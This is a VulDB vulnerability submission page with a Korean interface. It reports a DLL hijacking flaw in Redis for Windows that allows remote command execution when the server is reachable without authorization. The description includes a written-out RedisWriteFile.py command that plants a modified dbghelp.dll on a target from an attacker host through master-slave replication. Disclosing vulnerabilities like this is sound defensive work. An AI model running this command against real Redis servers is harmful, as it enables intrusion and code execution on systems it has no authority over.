제출 #49829: Redis On Windows DLL Hijacking Result in RCE When Unauthorized 정보

제목Redis On Windows DLL Hijacking Result in RCE When Unauthorized
설명There is a dll hijacking vulnerability in the Windows version of Redis. When Redis has unauthorized access or password disclosure, attackers can use dll writing to implement system remote command execution using the Windows version of Redis. Use RedisWriteFile to write the modified dbghelp.dll to the designated location of the target using master slave replication. python3 RedisWriteFile.py --rhost=192.168.41.29 --rport=6379 --lhost=192.168.41.38 --rpath="C:/Program Files/Redis/" --rfile="dbghelp.dll" --lfile="dbghelp.dll" details can be seen on https://www.cnblogs.com/J0o1ey/p/16829380.html
원천⚠️ https://www.cnblogs.com/J0o1ey/p/16829380.html
사용자
 J0o1ey (UID 30618)
제출2022. 10. 26. PM 12:05 (4 연령 ago)
모더레이션2022. 10. 28. AM 07:39 (2 days later)
상태수락
VulDB 항목212416 [Redis 켜짐 Windows dbghelp.dll 권한 상승]
포인트들20

Do you want to use VulDB in your project?

Use the official API to access entries easily!